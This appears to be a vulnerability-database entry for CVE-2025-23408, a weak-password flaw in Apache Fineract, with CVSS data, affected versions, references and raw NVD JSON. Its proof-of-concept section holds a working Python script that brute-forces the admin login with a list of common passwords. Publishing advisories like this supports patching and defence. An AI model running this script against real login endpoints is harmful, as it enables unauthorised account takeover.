Security Vulnerability Report
中文
CVE-2025-23408 CVSS 6.5 MEDIUM

CVE-2025-23408

Published: 2025-12-12 10:15:49
Last Modified: 2025-12-18 14:54:10

Description

Weak Password Requirements vulnerability in Apache Fineract. This issue affects Apache Fineract: through 1.10.1. The issue is fixed in version 1.11.0. Users are encouraged to upgrade to version 1.13.0, the latest release.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:fineract:*:*:*:*:*:*:*:* - VULNERABLE
Apache Fineract < 1.11.0
Apache Fineract <= 1.10.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-23408 PoC - Apache Fineract Weak Password Requirements # This PoC demonstrates brute-force attack on Apache Fineract authentication import requests import sys from concurrent.futures import ThreadPoolExecutor TARGET_URL = "http://target-server:8443/api/v1/authentication" TARGET_USER = "admin" # Common weak passwords list WEAK_PASSWORDS = [ "123456", "password", "12345678", "qwerty", "123456789", "12345", "1234", "111111", "1234567", "dragon", "123123", "baseball", "iloveyou", "trustno1", "sunshine", "princess", "admin", "welcome", "shadow", "ashley", "football", "jesus", "michael", "ninja", "mustang" ] def try_login(password): """Attempt login with given password""" try: payload = { "username": TARGET_USER, "password": password } response = requests.post(TARGET_URL, json=payload, timeout=10) if response.status_code == 200: data = response.json() if data.get("authenticated") == True: print(f"[!] VALID CREDENTIALS FOUND: {TARGET_USER}:{password}") return True return False except Exception as e: return False def main(): print(f"[*] Starting brute-force attack on {TARGET_URL}") print(f"[*] Target user: {TARGET_USER}") print(f"[*] Testing {len(WEAK_PASSWORDS)} weak passwords...\n") with ThreadPoolExecutor(max_workers=10) as executor: results = executor.map(try_login, WEAK_PASSWORDS) if any(results): print("\n[!] Attack successful - weak password found!") sys.exit(0) print("\n[*] No weak passwords found in the tested list") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-23408", "sourceIdentifier": "[email protected]", "published": "2025-12-12T10:15:48.870", "lastModified": "2025-12-18T14:54:10.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Weak Password Requirements vulnerability in Apache Fineract.\n\nThis issue affects Apache Fineract: through 1.10.1. The issue is fixed in version 1.11.0.\n\nUsers are encouraged to upgrade to version 1.13.0, the latest release."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-521"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:fineract:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.11.0", "matchCriteriaId": "60EAA7D5-1F4D-4A77-9EB6-F876B2834B25"}]}]}], "references": [{"url": "https://lists.apache.org/thread/bdlb6wl968yh1n48mr5npsk2spo6dncf", "source": "[email protected]", "tags": ["Vendor Advisory", "Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/11/5", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}